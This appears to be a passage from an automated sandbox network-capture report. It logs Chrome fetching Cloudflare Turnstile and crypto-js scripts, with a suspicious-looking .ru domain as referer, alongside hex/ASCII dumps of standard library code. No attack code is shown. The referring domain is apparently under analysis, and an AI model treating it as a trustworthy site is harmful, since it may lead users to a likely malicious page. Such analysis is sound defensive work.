                                                                                                        2024-10-04 13:11:38 UTC1369INData Raw: 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30 5d 29 2c 62 3d 44 28 62 2c 78 2c 53 2c 6d 2c 66 2c 32 31 2c 41 5b 35 31 5d 29 2c 6d
                                                                                                        Data Ascii: m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50]),b=D(b,x,S,m,f,21,A[51]),m


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.1652639104.18.95.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:39 UTC653OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://9wetjda.niavereinho.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:39 UTC441INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:39 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 47262
                                                                                                        Connection: close
                                                                                                        accept-ranges: bytes
                                                                                                        last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                        access-control-allow-origin: *
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b46dcaa8c8d-EWR
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                        Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 72 29 7b 76 61 72 20 61 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 61 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 6c 3d 21 31 2c 67 2c 66 3b 74 72 79 7b 66 6f 72 28 61 3d 61 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 63 3d 21 30 29
                                                                                                        Data Ascii: t(e){if(Array.isArray(e))return e}function Bt(e,r){var a=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(a!=null){var o=[],c=!0,l=!1,g,f;try{for(a=a.call(e);!(c=(g=a.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0)
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 73 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 73 5b 30 5d 26 26 28 61 3d 30 29 29 2c 61 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 6c 3d 73 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 73 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 6c 3d 63 2e 72 65 74 75 72 6e 29 26 26 6c 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 6c 3d 6c 2e 63 61 6c 6c 28 63 2c 73 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6c 3b 73 77 69 74 63 68 28 63 3d 30 2c 6c 26 26 28 73 3d 5b 73 5b 30 5d 26 32 2c 6c 2e 76 61 6c
                                                                                                        Data Ascii: ])}}function p(s){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,s[0]&&(a=0)),a;)try{if(o=1,c&&(l=s[0]&2?c.return:s[0]?c.throw||((l=c.return)&&l.call(c),0):c.next)&&!(l=l.call(c,s[1])).done)return l;switch(c=0,l&&(s=[s[0]&2,l.val
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 29 29 3b 76 61 72 20 56 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 56 65 7c 7c 28 56 65 3d 7b 7d 29 29 3b 76 61 72 20 53 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 46 41 49 4c 55 52 45 5f 57 4f 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 77 6f 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 3d 22 66 61 69 6c 75 72 65 2d 68 61 76 69 6e 67 2d 74 72 6f 75 62 6c 65 73 22 2c 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 3d 22 66 61 69 6c 75 72 65 2d 66 65 65 64 62 61 63 6b 22 2c 65 2e 46 41 49
                                                                                                        Data Ascii: ));var Ve;(function(e){e.AUTO="auto",e.LIGHT="light",e.DARK="dark"})(Ve||(Ve={}));var Se;(function(e){e.FAILURE_WO_HAVING_TROUBLES="failure-wo-having-troubles",e.FAILURE_HAVING_TROUBLES="failure-having-troubles",e.FAILURE_FEEDBACK="failure-feedback",e.FAI
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 4c 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 65 2e 69 6e 64 65 78 4f 66 28 72 29 21 3d 3d 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 39 65 35 7d 66 75 6e 63 74 69 6f 6e 20 63 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3e 30 26 26 65 3c 33 36 65 34 7d 76 61 72 20 41 72 3d 2f 5e 5b 30 2d 39 41 2d 5a 61 2d 7a 5f 2d 5d 7b 33 2c 31 30 30 7d 24 2f 3b 66 75 6e 63 74 69 6f 6e 20 58 74 28 65 29 7b 72 65 74 75 72 6e
                                                                                                        Data Ascii: unction L(e,r){return e.indexOf(r)!==-1}function nt(e){return L(["auto","dark","light"],e)}function it(e){return L(["auto","never"],e)}function ot(e){return e>0&&e<9e5}function ct(e){return e>0&&e<36e4}var Ar=/^[0-9A-Za-z_-]{3,100}$/;function Xt(e){return
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 5f 72 65 73 70 6f 6e 73 65 22 2c 79 74 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 2c 5f 74 3d 22 67 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 22 2c 65 72 3d 38 65 33 2c 62 74 3d 22 70 72 69 76 61 74 65 2d 74 6f 6b 65 6e 22 2c 74 72 3d 33 2c 72 72 3d 35 30 30 2c 61 72 3d 35 30 30 2c 59 3d 22 30 2f 30 22 3b 76 61 72 20 43 72 3d 5b 22 62 67 2d 62 67 22 2c 22 64 61 2d 64 6b 22 2c 22 64 65 2d 64 65 22 2c 22 65 6c 2d 67 72 22 2c 22 6a 61 2d 6a 70 22 2c 22 6d 73 2d 6d 79 22 2c 22 72 75 2d 72 75 22 2c 22 73 6b 2d 73 6b 22 2c 22 73 6c 2d 73 69 22 2c 22 73 72 2d 62 61 22 2c 22 74 6c 2d 70 68 22 2c 22 75 6b 2d 75 61 22 5d 2c 4e 72 3d 5b 22 61 72 2d 65 67 22 2c 22 65 73 2d 65 73 22 2c 22 63 73 2d 63 7a
                                                                                                        Data Ascii: allenge_response",yt="cf-turnstile-response",_t="g-recaptcha-response",er=8e3,bt="private-token",tr=3,rr=500,ar=500,Y="0/0";var Cr=["bg-bg","da-dk","de-de","el-gr","ja-jp","ms-my","ru-ru","sk-sk","sl-si","sr-ba","tl-ph","uk-ua"],Nr=["ar-eg","es-es","cs-cz
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 72 46 65 65 64 62 61 63 6b 2c 6f 3d 65 2e 69 73 4d 6f 64 65 72 61 74 65 6c 79 56 65 72 62 6f 73 65 3b 72 65 74 75 72 6e 20 61 26 26 72 3f 22 35 34 30 70 78 22 3a 61 26 26 6f 3f 22 35 30 30 70 78 22 3a 61 3f 22 34 38 30 70 78 22 3a 72 3f 22 36 35 30 70 78 22 3a 6f 3f 22 35 39 30 70 78 22 3a 22 35 37 30 70 78 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 48 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 6e 72 28 65 2c 72 29 7b 69 66 28 21 55 28 65 2c
                                                                                                        Data Ascii: rFeedback,o=e.isModeratelyVerbose;return a&&r?"540px":a&&o?"500px":a?"480px":r?"650px":o?"590px":"570px"};function He(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function nr(e,r){if(!U(e,
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 6f 72 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 49 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 63 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 7d 72 65 74 75 72 6e 20
                                                                                                        Data Ascii: f(o===null||!or(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,c)}function c(){return Ie(o,arguments,ce(this).constructor)}return
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 72 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 61 3d 65 2e 73 72 63 2c 6f 3d 61 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 72 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 57 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 70
                                                                                                        Data Ascii: ript tag, some features may not be available",43777);var r={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(r.loadedAsync=!0);var a=e.src,o=a.split("?");return o.length>1&&(r.params=new URLSearchParams(o[1])),r}function W(){return typeof p
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 69 75 73 3d 22 35 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 70 78 22 2c 73 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64 65 6e 22 2c 73 2e 73 74 79 6c 65 2e 6d 61 72 67 69 6e 3d 22 30 70 78 20 61 75 74 6f 22 3b 76 61 72 20 78 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 78 2e 69 64 3d 65 2b 22 2d 66 72 22 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 67 29 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 78 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64
                                                                                                        Data Ascii: ius="5px",s.style.left="0px",s.style.top="0px",s.style.overflow="hidden",s.style.margin="0px auto";var x=document.createElement("iframe");x.id=e+"-fr",x.setAttribute("src",g),x.setAttribute("allow","cross-origin-isolated; fullscreen"),x.setAttribute("sand


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.1652640104.17.24.144431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:39 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                                        Host: cdnjs.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:39 UTC936INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:39 GMT
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cache-Control: public, max-age=30672000
                                                                                                        ETag: W/"61182885-40eb"
                                                                                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Timing-Allow-Origin: *
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        CF-Cache-Status: HIT
                                                                                                        Age: 108149
                                                                                                        Expires: Wed, 24 Sep 2025 13:11:39 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9K1d5iI%2BPGDAXEeskho0S%2BhZru29oAbq9yrxfWTbGms8bTFKTiPt%2FJx5xUZuX4bYKFhzblkRJd2%2BBZrz043gLduYpJf2N0nzrt%2FgsVVJZoFGJAhKKPE%2BCuf%2BxcExbM8M2ZnTI9se"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b474ab54344-EWR
                                                                                                        2024-10-04 13:11:39 UTC433INData Raw: 33 39 37 61 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                                        Data Ascii: 397a!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e
                                                                                                        Data Ascii: s.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 72 61 6e 64 6f 6d 42 79 74
                                                                                                        Data Ascii: ds=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomByt
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63 65 73 73 42 6c
                                                                                                        Data Ascii: this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBl
                                                                                                        2024-10-04 13:11:39 UTC1369INData Raw: 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 35 5d 3d 65 5b 35 5d 2b 38 38 36 32
                                                                                                        Data Ascii: ,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1:0)|0,e[5]=e[5]+8862
